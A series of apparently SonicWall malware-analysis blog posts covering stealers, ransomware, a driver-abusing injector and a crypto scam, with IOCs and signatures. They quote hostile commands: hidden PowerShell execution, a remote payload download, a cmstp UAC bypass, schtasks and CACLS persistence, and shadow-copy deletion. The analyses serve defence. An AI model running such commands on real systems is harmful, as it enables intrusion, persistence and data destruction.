The Unseen Layers: Exploring the Tactics of Multistage .NET Malware Packers


Recently, the SonicWall Capture Labs Threat Research team has identified a new .NET Packer that is currently being widely used by the various stealers such as Lokibot, AgentTesla etc. In the ever-evolving landscape of cybersecurity threats, malicious actors continue to develop sophisticated techniques to compromise systems and exploit vulnerabilities. One such method gaining prominence is the use of multistage .NET malware packers. These devious tools leverage the capabilities of the .NET framework to execute nefarious activities, posing a significant challenge to the cybersecurity of endpoints.
Packers employ the dynamic loading features of .NET, allowing them to download and execute additional modules or payloads off the land without ever touching the secondary storage such as Hard Disks.

To avoid detection, Packer employs evasion techniques such as polymorphic code, obfuscation and encryption. These methods make it difficult for security tools to analyze the malicious code, as it constantly changes its appearance or remains concealed within layers of encryption.


Currently, Packer is mainly delivered though phishing emails with a .ZIP file as an attachment. The ZIP attachment contains the PE Packer file.

Figure 1: Infection Chain


Layer 1 of Packer consists of an encrypted layer and the final payload as resource objects. Its execution begins by decrypting the next layer, which is encrypted as a resource of the Packer file named “QuanLyKhSan.GUI.ucDichVu.FR”.

Figure 2: Resource objects stored in layer 1

Figure 3: Decryption code logic for layer 2

Layer 2, which is a DLL file, consists of six exported functions.

Figure 4: Layer 2 classes along with function names

It decrypts the resource “GloriousCore.Properties.Resources.resources.HgoHWhJ”, which is an encrypted fifth layer. Meanwhile, decrypting it causes it to sleep for 15 seconds to evade detection from emulators.


1.) Loading of Ⴈ.dll

  • a. Ⴈ.dll is hardcoded in layer 2 as an encrypted byte array.
  • b. The byte array is first transformed using a simple XOR operation.

    Figure 5: XOR operation

  • c. The transformed array is then decompressed using the deflate algorithm and loaded into memory.
  • d. “Ⴈ.dll” has an encrypted resource named "Xeros.Vu.resources. Ⴐ"

2.) Decryption of resource “Xeros.Vu.resources. Ⴐ”

  • a. Layer 2 uses GZipStream to decompress the resource object “Ⴐ”.
  • b. It decrypts the decompressed buffer using an XOR loop.
  • c. The decrypted bytes are a DLL module called “ReactionDiffusion.dll”

    Figure 6: Functions names and XOR keys are stored in an encoded array.

3.) An instance of the ReactionDiffusion.dll module is created.

  • a. ReactionDiffusion.dll decrypts the method name “CausalitySource”.

    Figure 7: Invoking the function "CausalitySource"

  • b. The resource “HgoHWhJ” is a PNG file.

  • c. Packer uses steganography to hide the encrypted layer 5. It executes the function “RestoreOriginalBitmap” to convert the bitmap PNG file into an encrypted byte array.

    Figure 8: Bitmap decoding function from ReactionDiffusion.dll

  • d. An encrypted byte array is decrypted using an XOR loop with three byte keys.

    Figure 9: Decryption function for layer 5

  • e. Final output is the “Tyrone.dll” module.
    4.) Tyrone.dll has an embedded encrypted final payload. In this case, it’s LokiBot.

    Figure 10: Final payload embedded as resource

  • a. Encrypted resource “bcBuFuHG” is decrypted using a simple XOR.

Figure 11: Loading of resource using Resource Manager

Figure 12: Decryption code of the final payload

Lastly, the final payload is injected into a newly created self-process using process hollowing. The final payload in this analyzed Packer is identified as LokiBot, for which we have already written a blog post.

Evidence of the detection by SonicWall’s patented RTDMI™ engine can be seen below in the Capture ATP report for this file:

Figure 13: RTDMI ATP result report conclusion

As .NET malware packers continue to evolve, so must our cybersecurity strategies. Staying informed about the latest threat vectors, adopting advanced security solutions and fostering a proactive cybersecurity posture are essential steps in mitigating the risks posed by these insidious threats. By understanding the intricacies of .NET malware packers, organizations can better protect their systems and data from the ever-present challenges of the digital landscape.



  • 070b7112e24ec3a1f2d7cfab98cee1e7f3940a33b199e4ae04b367f9dd20d451


  • 301e3dd329bd0c0aa4f40a68100350867bd5c956a13f238eedbf68d58c13f2e9
  • 26c034022d9d6924477e3e79cc95590f394e3ccf2ad743163c5a80baacf2a66f
  • 4c9c03f472adf45cc9f246fdf83b28fd1e197bc2ad831dfb75371bb14d5b5585


  • d51297e331fce1ba9f707991445e746a5bce48b1892dfc79d107dcbff9a0b2cf


  • a02e8a878b70f214f0b9cff49a7d1f594114b80dd1935f9f9e4ea19fb978ba54

Malicious LNK Files Use PowerShell to Deliver Payload


This week, the Sonicwall Capture Labs Research team has observed an increase in shortcut-based (LNK) malware. These seemingly legitimate LNK files execute PowerShell commands to download malware from a remote server.

Infection Cycle

The malware sample arrives as a file with a .lnk file extension and may use the following names:

  • New product Reebok 2023.lnk
  • Income and benefits - UNIQLO 2023.lnk
  • Requirements and responsibilities - UNIQLO 2023.lnk
  • LAST STUDIO List new product 2023.lnk
  • Last Studio 2023 New Arrivals Campaign Contract.lnk

Executing the .lnk file will run an instance of powershell.exe in the background. PowerShell is built in to Windows and is used as a scripting language that is mostly used to automate admin tasks.

The script is base64 encoded, and when decoded, it shows that its main purpose is to download additional files from a remote server.

Figure 1: Command line

The execution of this script is done without the knowledge of the user and utilizes the following options when running PowerShell.

p o w e r s h e l l . e x e - N o L o g o - N o P r o f i l e - W i n d o w S t y l e h i d d e n - E x e c u t i o n P o l i c y b y p a s s - E n c o d e d C o m m a n d

Meanwhile, an image file is launched and shows a picture of a product. In the screenshot below, an image of what seems like a Reebok-branded outfit is shown when executing the malicious LNK file named “New product Reebok 2023.lnk”.

Figure 2: Reebok outfit

During our analysis, a file named svczHost.exe was downloaded in \Windows\Temp.

Figure 3: Powershell.exe connecting to a remote host to download a file which was saved into %temp% directory as svczHost.exe

This then further downloaded another file named MyRdpService.exe in the same directory.

Figure 4: SvczHost.exe connecting to a remote host and downloading an additional component file that was later written into %temp% directory as myRdpService.exe

As seen in Figures 5 and 6, MyRdpService.exe was constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 5: MyRdpService.exe constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 6: Encrypted packet sent to remote C&C by MyRdpService.exe

Figure 7 shows a log file named logrdp.txt was created which looks like the connection log file. Interestingly the log file, contains some text in Vietnamese.

Figure 7: Log file

We have seen an increasing amount of malicious LNK files used by cybercriminals to deliver payloads. These Windows shortcut files can contain malicious code to abuse legitimate windows system tools, which is a simple way for criminals to evade detection.

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signature:

• GAV: Suspicious#powershell.steal (Trojan)
• GAV: Infostealer.AIL (Trojan)

This threat is also detected by SonicWALL Capture ATP with RTDMI and the Capture Client endpoint solutions.

, ,

AgentTesla Updates Its Infection Chain

The SonicWall Capture Labs Threat Research team has observed AgentTesla infostealer being deployed using image(.jpg) files for last few months. We have observed multiple ZIP files with titles in European languages. Different IPs were seen targeting European nations with AgentTesla stealer and other bots having a wide variety of capabilities.

Figure 1: Infection Chain

The initial infection vector is an email with a ZIP file as an attachment. Inside the ZIP file there is a VBS script which is highly obfuscated, needing some heavy de-obfuscation to extract the next stage. The VBS on execution decodes the PowerShell code below:

Figure 2: PowerShell Script

This PowerShell then downloads an image file Rump_vbs.jpg from the URL: "hxxps://uploaddeimagens[.]com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937".

Figure 3: Image file embedded with DLL

The PowerShell retrieves a base64 encoded DotNet DLL file from the image file which is embedded between marker tags "BASE64_START" and "BASE64_END". This data is decoded and the DotNet assembly is then loaded into memory.


Figure 4: Image marker tags

After that, the PowerShell loads decoded Fiber.dll, which has the method "VAI" downloading and executing base64 encoded DotNet executable from the URL: "hxxp://79.110.48[.]52/kenjkt.txt".

This is done using: "$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.tkjnek/25.84.011[.]97//:ptth' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))".

The downloaded Fiber.dll is again a heavily obfuscated DotNet assembly and has obfuscated API strings for process injection. Although it has a number of methods, a majority of the methods inside the file have junk code.


Figure 5: Obfuscated API names for Process Injection


For a long time, AgentTesla has been known for its wide variety of stealing and logging capabilities.
The txt file hosted on URL "hxxp://79.110.48[.]52/kenjkt.txt" has base64 encoded data. The decoded DotNet executable is the AgentTesla Payload. First, it enumerates for all of the Chromium-based and Mozilla-based browsers for the sensitive data they store.


Figure 6: Chromium-based browser's data

Next, it appears that the malware has methods to search for Mozilla login data including the username and passwords in the victim's machine.

Figure 7: Mozilla logins

Furthermore, it has functionality to retrieve sensitive credentials stored using Windows Vault GUIDs.

Figure 8: Win Vault GUIDS

AgentTesla does have keyboard hooking, clipboard hooking and logging functionality. Additionally, it has multiple APIs to retrieve keyboard layout and other details as well as information related to Windows and other system information.

Figure 9: System information APIs

The stealer also has a list of sensitive strings or smart words, which contain a number of words leading to the private and sensitive information of an individual. In addition to this, it also checks for different email software, other common software for DB management and FTP connection and a few more well-known software.


Figure 10: SmartWords and Telegram bot

Further, the data is exfiltrated via a telegram bot.

Evidence of detection by SonicWall's RTDMI ™ engine can be seen below in the Capture ATP report for this file:

Figure 11: RTDMI ATP report results



  • hxxp://79.110.48[.]52/kenjkt.txt
  • hxxps://uploaddeimagens.com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937

Payola ransomware operator demands remote access to PC

The Sonicwall threat research team have recently been tracking a new ransomware family called Payola. This family of ransomware appeared in late August 2023. It is written in .NET and is easy to analyze as it contains no obfuscation. Early variants would append ".Payola" to the names of encrypted files but the current variants use 5 random alphanumeric characters. During a direct conversation with the malware operator, remote access to our system was requested in order to retrieve files.

Infection Cycle:

The malware uses the following icon:

Upon execution, the following message is shown on the desktop background:

Files on the system are encrypted. Each encrypted file is given a 5 character alphanumeric extension appended to its name eg. image.jpg.PTebc.

The following registry entry is made:

  • HKCU\Microsoft\Windows\CurrentVersion\Run Readme {run location}

A file named README.html is dropped into directories where files where encrypted. It contains the following message:

The code is written in .NET and is trivial to decompile. We can easily see its main function and the intended program flow:

The RSA public key and salt values can be seen:

The malware contains a list of programs that will be killed if running:

A list of targeted directories and file types are listed in the code:

We followed the instructions in the ransom note and got in touch with the operator. We had the following conversation via email where the operator demanded remote access to our system using Anydesk:

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: Payola.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.


Mystic Stealer Uses Trickery To Steal Data

This week, the SonicWall Capture Labs Research Team looked at a sample of Mystic Stealer. This is an infostealer that first appeared earlier in 2023. It has a variety of defensive techniques to evade detection and hamper analysis, and is coded to steal a variety of information (including Steam credentials). Mystic uses geolocation, installed languages, and local time to ensure the malware is on a viable victim system.

Static Analysis

The main sample (md5:b8afb88f471cf88b67db6a39ff4053e3) has several points to note. In Figure 1, there is no packer or protector listed in the initial detection; however, the creation timestamp is very recent. There are two atypical sections listed: .inter and .00cfg (Figure 2). There is also a unique .pdb file referenced in Figure 3.

Figure 1: Initial sample detection

Figure 2: Abnormal PE file sections

Figure 3: Timestamp for the debugger is extremely recent

Looking at the file in a debugger, it is immediately apparent that this program was created to hamper analysis (Figure 4). Every single step immediately preceding the entry point is a jump to a function that will perform multiple checks against the system. These include:

  • Location: GetLocaleInfoW, IsValidLocaleName, GetUserDefaultLCID, LCIDToLocaleName, GetSystemTimeAsFileTime, EnumSystemsLocaleW
  • Virtual Machine/Debugger: IsProcesserFeaturePresent, IsDebuggerPresent,OutputDebugString, QueryPerformanceCounter, QueryPerformanceFrequency, GetProcessHeap, GetCurrentProcessId, GetCurrentThreadId

Figure 4: Obfuscation by jump instructions

Within many functions, 'call-push-ret' is being used as a way of indirectly using system API calls (Figure 5). Once the locale check has been cleared, only debug and VM checks are performed intermittently.

Figure 5: A known method of obfuscation is using 'call-push-ret'

The program is also capable of setting its own sleep and wake conditions as shown in Figure 6, further enabling the malware to evade system defenses.

Figure 6: Dynamic sleep conditions and virtual machine checks

Dynamic Analysis

Running the sample without any patching results in an immediate error and the program terminates. The first round of checks to bypass are location and debugging protections, followed by intermittent virtual machine checks. At this point, the file will access the '.inter' section at memory location 0xD80000. Manually running the next function will create a new PE file in the newly available space, as seen below in Figure 7.

Figure 7: A new executable is written to the '.inter' section

Once this new program has been written, the command to run 'AppLaunch' is written to memory and executed (Figure 8). AppLaunch is a .NET application that is used by the malware for process injection.

Figure 8: The command 'C:\Windows\Microsoft .NET\Framework\v4.0.30319\AppLaunch.exe' is written immediately before launch

Once AppLaunch runs and the payload is injected, enumeration of the system will occur as well as an initial attempt to send data to the C2 server. Pulling strings from runtime memory of 'AppLaunch' shows that the injected payload is looking for analysis software.

Figure 9: Strings for known analysis tools IDA, Scylla, Immunity, x32/64dbg

A file is written to '~\AppData\Local\Temp' as seen below in Figure 10. The name is hard-coded (4375vtb45tv8225nv4285n2.txt), and subsequent runs will create a file with the same name.

Figure 10: A file is written to '~\AppData\Local\Temp' when malware is successfully run

The contents of the file show an IP address that is unsuccessfully contacted (Figure 11). This happens regardless of network connectivity, which means at the present time the IP is down or is not accepting communications. This IP is based out of Russia (Figure 12).

Figure 11: Log contents from written temp file

Figure 12: IP data


A packet capture shows what was sent to the malicious IP. The data is base64 encoded but contains basic information about the system. A partial capture is below in Figure 13.

Figure 13: The ASCII plaintext has a 'hwid' indicating the encoded system name

The full decoded message reads:

Sent system information
SOFTWARE\Microsoft\Windows NT\CurrentVersion
Current language:
Operation System:
IP: {ip}
File Location:
Available KeyboardLayouts:
Country: {country}
Location: {location}
Zip code: {zipcode}
TimeZone: {timezone}

Extracting the injected payload from memory, it is another PE file that has no import or export table, no listed functions, and the debug timestamp is set in the future (Dec 3, 2023) as seen in Figure 14. There are a handful of plaintext strings that show some capabilities in Figure 14 but, given that the import table doesn't (visibly) exist, it is difficult to determine exact functions.

Figure 14: The payload has no visible imports, exports, or functions. The debug timestamp is also from the future.

The listed strings show that the program can enumerate through files and running processes, but there are no file paths or application names found.

Figure 15: Visible strings give an idea of capabilities

In a debugger, the payload has functions to not only continuously check the system for analysis tools but will also terminate if any number of them fail (Figure 16). Each function also has the same set of of referenced items 'LdrpInitializeProcess' and 'minkernel\\ntdll\\ldrinit.c'. After bypassing these evasion checks, several decoding functions were found.

Figure 16: Each green arrow represents a decision tree where the program can terminate

Using several methods to decode the data resulted in a complete dump of all commands. Figure 17 has a partial listing of what is enumerated by the malware, with a complete listing below.

Figure 17: Partial list of decoded commands

Dynamic imports (decoded):

  • Ole32.dll
  • User32.dll
  • Ntdll.dll
  • Gdi32.dll
  • Wininet.dll
  • Crypt32.dll
  • Gdiplus.dll
  • Shlwapi.dll
  • Kernel32.dll
  • Advapi32.dll
  • Rstrtmgr.dll

Data marked for extraction:

  • Chromium-based browsers
  • Chromium browser extensions
  • Chromium wallets
  • Gecko-based browser data
  • Gecko browser extensions
  • Web history
  • Saved credit card data
  • Autofill information
  • Cookies (chromium, mozilla)
  • Saved logins
  • Steam installation data
  • Telegram
  • Outlook (SMTP, POP, IMAP, HTTP credentials and addresses)
  • User tokens
  • Screenshots are taken during enumeration

Mystic creates persistence with a scheduled task using the command '/c schtasks /create /F /sc minute /mo 15 /tr "%ls" /tn "\WindowsAppPool\%ls"'.

Mystic Stealer is highly evasive and can easily exfiltrate a large amount of data very quickly. These samples are detected by the following signatures: MysticStealer.Dropper, MysticStealer.Payload


Main sample
md5: b8afb88f471cf88b67db6a39ff4053e3
sha1: 1c3c992f74a7905af067ef49657537e71be67413
sha256: 6ba71b02669ff6b6e939e334fd5b2aa907bfd3f54215c19df094be1cd5b948f8

md5: 4DF77A52DCE196CD2B3EE22A4E5A10B4
sha1: A9EB223D5A63592470723379CD975720895BEA47
sha256: BBDFF99D02941D59512389B4D6A43B0A23AF799A270204A6FF925BE550078A42



, , ,

A look at the latest Snatch Ransomware

This week, the Sonicwall Capture Labs Research team analyzed the latest Snatch ransomware. Snatch operates as a ransomware-as-a-service (RaaS), a business model where the malware authors lease out the ransomware program to affiliates who then launch the attacks.

Infection Cycle:

The malware file  arrives as an executable  using a random name such as:

  • rljybc.exe

This ransomware is written in Go language and is apparent in the many references to Go packages in its strings.

go lang packages

Upon execution it creates multiple copies of the same batch file into the %temp% directory:

Simultaneously it also writes a randomly named file with a .dll extension that appears to be a library file.

But upon careful inspection, it actually was a log file of its execution showing files it had accessed and created.

The batch file created is used to run commands to delete shadow copies and to disable certain services that are related to Antivirus, back up software, database, email among many others.

It appends “.lqepjhgjczo” extension to all files it encrypts and adds the ransomware note to every directory in the system.

The ransom note only lists email addresses on how to reach the malware authors and no amount of ransom is mentioned. Presumably, this amount may vary depending on their victim and how disruptive the attack would cost a business or an organization.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Snatch.RSM_13  (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.


Amadey & Redline Are Still Going Strong

This week, the SonicWall Capture Labs Threat Research Team has observed the following threat:

The Amadey botnet malware has been packaged with a Redline infostealer to infiltrate systems, extract a variety information, and enable control via a C2 server. Both of these malware families are Russian in origin and can be found on darknet markets, with purchase prices between $100-500 USD. These malware samples acting in tandem could compromise user accounts and passwords for the infected system as well as online accounts, cryptocurrency wallets, and other sensitive information.

Static Analysis

Identifying the parent file (6f47b64e9fd997e45e2f13fc93a4aa24acefdb763096aa1636c05c0520d7ccbf) using Detect It Easy shows that it is an cabinet installer (Figure 1) and does not give any indication of packers or encryption.

Figure 1: Initial sample detection

Unpacking the parent archive gives five separate files:

  • 9a6ef1a115b9367809c7e5533fec7b462a9f56570b318b492b85f56d86dad9db (32bit .NET DLL)
  • c7eefb8ad88563225d2f6dbf8c172b8f9c762d4568165e7dda0cf5fe99d37bad (32bit .NET EXE)
  • 3169784f33db3ef9f601721690e712e7397fdfcb62a7f8fe9c991aa5d74bb93e (32bit EXE)
  • 73bf27825701303fbb23daf35fb053f4fbd2f788f833d13f3a695ea0b9dc78cd (32bit .NET EXE)
  • 59e62d21e9db964ff3d98c7b8be190584754c87d1bbde2dea80c7e9b27b14ed0 (32bit EXE)

Of these files, there are two that automatically have suspicious characteristics: c7e and 73b are both timestomped, showing a creation timestamp in the future (Figure 2). 73b is also identified as having Confuser Ex obfuscation (Figure 3), which hinders analysis to a high degree.

Figure 2: Timestamps showing file creation in the year 2090

Figure 3: A creation date of 2067; Confuser Ex is an open-source protection software for .NET software

Looking through strings, file 316 has a reference to an Amadey.pdb file (Figure 4) within the debug strings; this is a custom debug file that loads symbols (resources or filepaths) as an alternative what may be in the finished program. The API calls that are listed show capabilities in Figure 5 cover the following areas: networking, system enumeration (to include registry, accounts, files, programs, and running processes), process injection, data manipulation, and security. The accompanying files also assist in network connections and enumeration with the exception of 9a6; this is a small .DLL file (~2kb) that is used for process side-loading.

Figure 4: String reference to Amadey

Figure 5: API calls within Amadey that confirm some of the malware functionality

Amadey has multiple methods of evasion for both runtime and analysis. This includes but is not limited to: sleeping for long periods, virtual machine and debugger detection (IsDebuggerPresent, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcess), and obfuscation. Removing ConfuserEx from the Redline sample shows the capabilities of what the file is doing. The file is named 'Doggeries.exe', and has a large number of functions for both parsing data and communication, as seen below in Figure 6.

Figure 6: Redline deobfuscated, showing a method of communication via email

Dynamic Analysis

Running the main application, files are dropped into the following locations and automatically renamed:

  • "~\Desktop\v5f6rvVc7A.exe"
  • "~\AppData\Local\Temp\IXP000.TMP\"
    • j3346492.exe
    • x3075787.exe
  • "~\AppData\Local\Temp\IXP001.TMP\"
      • i8210436.exe
    • x0248748.exe
  • "~\AppData\Local\Temp\IXP002.TMP\"
    • h8899948.exe
    • g3601528.exe
  • "~\AppData\Local\Temp\925e7e99c5\"
    • pdates.exe
  • "~\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll"

Once the files are dropped, persistence is created during the following steps:

  • 'schtasks.exe' is run by 'pdates.exe' with the following command, which will run 'pdates.exe' once every minute:

'"System32\schtasks[.]exe" //Create //SC MINUTE //MO 1 //TN pdates[.]exe /TR "~\925e7e99c5\pdates[.]exe" /F'

  • 'cacls' (Windows Access Control List) is used to set permissions on both the file and the directory to prevent runtime issues:

'"System32\cmd[.]exe" /k echo Y|CACLS "pdates[.]exe" /P "user:N" (&&) CACLS "pdates[.]exe" /P "user:R" /E (&&) echo Y|CACLS "..\925e7e99c5" /P "user:N" (&&) CACLS "..\925e7e99c5" /P "user:R" /E (&&) Exit'

  • A Windows registry key is changed to the following value to autostart when the system boots:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders: ~\AppData\Local\Temp\925e7e99c5\

As this is occurring, another file is run named 'Healer.exe' (it will have a randomized name when dropped). The only function 'Healer' has is to disable Windows Defender and prevent it from updating, as seen below in Figure 7.

Figure 7: Healer's functions and targeted registry keys

After 'Healer' has been run, 'pdates.exe' will reach out to the C2 and download 'clip64.dll' (Figure 8).

Figure 8: Communication is established, followed by 'clip64.dll' downloading

Clip64 is used to pull data from the clipboard and package it to be sent back to the C2. There is also a reference to Amadey in a .pdb path within the file (Figure 9).

Figure 9: Amadey Clipperdll.pdb reference (left), and clip64.dll capabilities (right)

An additional module named 'cred64.dll' also attempts to download, but is unsuccessful (Figure 10). It is unknown whether this is deliberate or accidental on the botnet operator's part.

Figure 10: The file 'cred64.dll' failed to download to the target system

A hook is installed using DirectDrawCreateEx to capture user input and activity. Amadey and Redline will enumerate the system in its entirety to collect hardware specifications, OS version, user accounts, installed software, credentials (in- and out of browser), documents, and cryptocurrency wallet information (Figure 11).

Figure 11: C2 and cryptocurrency information

Amadey and Redline are detected by RTDMS and the signature Amadey.R(Trojan).


6f47b64e9fd997e45e2f13fc93a4aa24acefdb763096aa1636c05c0520d7ccbf (parent file)
9a6ef1a115b9367809c7e5533fec7b462a9f56570b318b492b85f56d86dad9db (exhalhENZZbhvzCCmysGrfFiklOcA.dll)
3169784f33db3ef9f601721690e712e7397fdfcb62a7f8fe9c991aa5d74bb93e (Amadey payload)
73bf27825701303fbb23daf35fb053f4fbd2f788f833d13f3a695ea0b9dc78cd (Redline payload)
2244b4dc9afc6cfab7ef1dea92420e2acd275bac7349b929a69f3c1ae25f5e2f (pdate.exe)
58b02c8b4bc2bf7f5f1e8e45d7c206956f188ae56b648922ca75987b999db503 (clip64.dll)



RunpeX Abuses Legitimate AntiMalware Driver

SonicWall Capture Labs Research team has observed RunpeX is abusing vulnerable version of kernel driver belonging to Zemana AntiMalware. RunpeX is a protector and malware injector based on KoiVM .NET protector. RunpeX is widely used to deliver different malware families like Remcos, Formbook, AgentTesla, Redline, Vidar, etc. The legitimate driver dropped by RunpeX is used to kill/disable AV/EDR processes which are generally protected. This technique is also known as Bring Your Own Vulnerable Driver (BYOVD). Previously, this technique has been employed by APT groups, AV/EDR killer tools, and ransomware actors.

Layer 1:

First-stage loader is .net application, which contains encrypted second stage payload hardcoded in byte array. This byte array is decrypted and executed using Assembly.Load() method.

Figure 1: Byte array contains encrypted second-stage loader and InvokeMethod() function 


Before executing second stage payload, function named "Do()" is called to bypass AMSI detection by patching AmsiScanBuffer() function.   

Figure 2: Function to bypass AMSI  

Layer 2:

Second-stage loader is .net RunpeX, which is protected with customized KoiVM virtualizer. This payload is responsible for installing Zemana AntiMalware driver.

Figure 3: Decompiled code of second-stage payload


In order to disable security solutions, this second stage payload drops and install Zemana driver. The driver is dropped at the root of “c” drive with name "Zemana.sys” and is signed by “Zemana Ltd.”

Figure 4: Driver is signed by “Zemana Ltd"


To install driver on system, RunpeX elevate privileges using CMSTP UAC bypass technique. Below command is executed to achieve privilege escalation:

  • "c:\windows\system32\cmstp.exe /au C:\windows\temp\1brdhu0p.inf"

Figure 5: Privilege escalation and UAC bypass using cmstp.exe


The INF file used in this UAC bypass is similar to the file present on GitHub.

Figure 6: Content of inf file


In the next step, driver service is created with name “Zemana” to load driver.

Figure 7: Service named “Zemana” is created to load driver


Then it retrieves handle to the loaded driver using CreateFileA() function:

Figure 8: Code snippet to retrieve driver handle


Using the handle created in the above step, RunpeX sends IOCTL code 0x80002010 to register itself as a trusted process by the driver.

Figure 9: IOCTL used to add process in trusted list


Finally, RunpeX sends another IOCTL code 0x80002048 to terminate target process by passing process PID as parameter. Using this IOCTL, it terminates all processes which are present in the configuration list.

Figure 10: IOCTL used to terminate security software processes


Driver IOCTL functionality

Below figure shows IOCTL handler functions that are part of installed driver:

Figure 11: Driver function to handle IOCTLs

Indicators Of Compromise (IOCs):

  • 2d3c9078e40a6dd286b36dbaaf1f0a367d22a0f9e30a2fc93d1d8ba5b9b97ce8 - Initial Payload (.Net Application)

SonicWall Capture Labs provides protection against this threat via the following signature:

  • Injector.RPX (Trojan)
, , ,

A new variant from Chaos Ransomware family surfaces

The SonicWall Capture Labs Research team has received a sample of a new variant from Chaos Ransomware family which is a customizable ransomware builder that emerged in underground forums, by falsely marketing itself as the .NET version of Ryuk.

It provided the following customizable options which a cybercriminal can use to customize a ransomware.

  • processName = "svchost.exe";
  • sleepTextbox = 10;
  • spreadName = "surprise.exe";
  • userDir = "C:\\Users\\";
  • checkAdminPrivilage = true;
  • checkCopyRoaming = true;
  • checkdeleteBackupCatalog = true;
  • checkdeleteShadowCopies = true;
  • checkdisableRecoveryMode = true;
  • checkSleep = false;
  • checkSpread = true;
  • checkStartupFolder = true;
  • droppedMessageTextbox = "read_it.txt";
  • encryptedFileExtension = "";
  • encryptionAesRsa = true;
  • messages = new string[]; #Ransomware message content

Infection Cycle:

At the start of the execution it checks its own filename and the location from where it is running.

If the process name and the location name is not %appdata%\\svchost.exe, it drops a copy of itself to %appdata%\\svchost.exe and launches it.

After that it checks for the "checkSleep" variable which is provided at the time of building ransomware, if the value is False is will skip executing the sleepOutOfTempFolder(), function which also checks the folder location form where it is running and if the path does not matches, it uses another count variable "sleepTextbox" whose value is multiplied by 1000 times and resulting value is passed to thread and sleeps for that many milliseconds.

It then checks for the checkStartupFolder flag and if its true it calls addLinkToStartup() function.

It creates a file svchost.url in which it adds the location of the file and copy the file into User Startup folder to
enable its automatic execution at every system startup

It has a hardcoded list of directories and files with valid extension in those directories are only encrypted.

List of the extension

Before encrypting the file it checks for the list of valid file extensions and the filename should not be one in the droppedMessageTextbox supplied at the time of building the ransomware.

This droppedMessageTextbox contains the name of the file which contains the ransomware message.
In our case the filename is "read_it.txt";

Before encrypting the file it checks for the File length.
If the file length is below 2,117,152 bytes, it encrypts the file using EncryptFile method and if the size is bigger than
2,117,152 bytes a random string of a random length between 200000000 and 300000000 bytes is generated and encoded using the randomEncode method.

It creates a 20 byte random password and converts the password to a byte array using UTF8 encoding.
The content of the file is then AES encrypted using that key.
It then encrypts the key generated earlier using the RSA encryption

AES encrypted content are again converted into Base64 encoding.

It then concat the RSAEncrypted key and base64 encoded content into the file using File.WriteAllText method.

Finally, original file is moved to same location by appending a random extension using the RandomStringForExtension method.
It then drops the "read_it.txt" containing the ransomware message on that location.

Once the encryption is done it delete Shadow Copies, disable Recovery Mode and delete Backup Catalog file using below commands.

"vssadmin delete shadows /all /quiet & wmic shadowcopy delete"
"bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no"
"wbadmin delete catalog -quiet"

In order or spread, it loops through all the available drives on the system and if the drive is not a C:\ drive and the spreadName file is not present on the system, It copies the malware’s file to that drive with the specified spreadName.

This way the malware can potentially infect other machines whose drives are mapped onto the victim's machine.

Once the encryption is completed it displays the ransomware message text.

It set the below wallpaper

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV:MalAgent.RSM_99 (Ransomware)

, , , , ,

Google script being abused for Cryptocurrency fraud

SonicWall Capture Labs Research team has discovered an ongoing instance of cryptocurrency fraud that utilizes legitimate Google services, specifically Google Script macros. Threat actors intentionally target these platforms because they are both convenient to use and malicious code can evade detection by anti-malware systems.

Google Script macros are primarily designed to enhance productivity and streamline workflows within Google services. However, threat actors are now exploiting them for fraudulent purposes, finding ways to execute malicious code within the context of legitimate Google applications.

In this case, a PDF file is being circulated, containing a malicious URL that was created using Google Script. Once the user interacts with this URL, they are redirected to the actual fraudulent website.

Fig: PDF File


Below shown the response to the malicious URL using Google Script Macro.

Fig: Fiddler capture of malicious Google Script Macro


When the URL in the PDF file opens it shows Google’s message that this application was created by another user not by Google when clicked on the webpage it redirects to office[.]proprogramvipt[.]top

Fig: Google script malicious URL


After redirection, On this deceptive webpage, user is confronted with a warning message indicating that their account is at risk of deletion due to inactivity. To add a sense of urgency, a countdown timer is displayed, suggesting that the account will be deleted imminently.

In order to prevent the account deletion and purportedly withdraw the funds (which, in reality, are non-existent), user is instructed to sign in.

Fig: Warning for account deletion


Upon signing in, user is presented with a prepopulated sign-in page that appears legitimate. The page is carefully designed to create an enticing welcome-back message, which includes displaying the user's Bitcoin balance in both BTC and USD values. This serves as bait to lure user into continuing further with the process.

Fig: Sign-in & welcome message


To create an illusion of authenticity, various elements that mimic legitimate features commonly found on cryptocurrency platforms are presented. These elements include:

History: A fabricated transaction history is displayed, showcasing previous transactions to make the platform appear genuine.

User Chat: Fictitious comments and messages from fake users are shown, attempting to simulate user activity and engagement on the platform.

Settings: Users are provided with an option to collect bitcoins, along with the ability to change their password. This is aimed at giving the impression of user control and customization.

News: Fake news articles are presented, falsely claiming updates such as a switch to a new cryptocurrency system, the addition of PayPal payouts, or technical server-related updates. These news pieces aim to instill a sense of credibility and innovation.

All of these elements are carefully designed to create an atmosphere of legitimacy and trust, further deceiving users into believing that the fraudulent platform is genuine and reliable.


Fig: News, Settings, Chat & History


It shows the current balance in BTC & USD with a button to collect bitcoin bonuses.


Fig: Collect BTC Bonuses


After clicking the “Collect Bitcoin Bonuses” button it shows a progress bar as if mining is going on the system with fake transaction hashes.

Fig: Fake mining


Once the progress bar reaches 100% it shows collected BTC and a get paid button.


Fig: BTC collection


After clicking get paid it asks for the user’s personal details along with account/card details.


Fig: User's details


After getting all the details shows forwarding the details to the manager and they have their own chatbot which says details are verified without any validation even if random input is given.

Fig: Chatbot

Then for currency exchange, it redirects to BTC pay & the user has to pay in bitcoin.


Fig: BTCPay


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: CryptoFraud.A (Trojan)

